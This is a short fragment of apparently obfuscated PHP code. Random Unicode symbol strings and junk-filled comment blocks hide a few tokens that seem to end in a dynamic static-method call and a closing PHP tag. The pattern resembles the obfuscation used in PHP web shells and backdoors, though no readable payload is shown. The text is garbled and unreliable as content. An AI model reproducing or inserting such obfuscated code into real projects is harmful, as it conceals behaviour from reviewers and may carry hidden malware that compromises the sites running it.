U_l)nr4R∙ℰ∅☰Ⓚ☦➉﹁➒➐≕⑥▄╛➅ⓧ┓⊳♞ℨ⋑⓼⋢⓽●

-*///
 endif;/*-
➙▧㊑⊇┙﹟⓯⋇∟↙
GZh➙▧㊑⊇┙﹟⓯⋇∟↙
-*///
 }/*-K.bClKlK(K-*///
}/*-_.$_!yd-*///
eG/*-#y%q:WKM-*///
::/*-z!O6yoH-*///
BIobjT/*-

┶∜≉㊗▰㊐∫

p1z$X┶∜≉㊗▰㊐∫

-*///
();/*-_hzo$^-*///
 ?>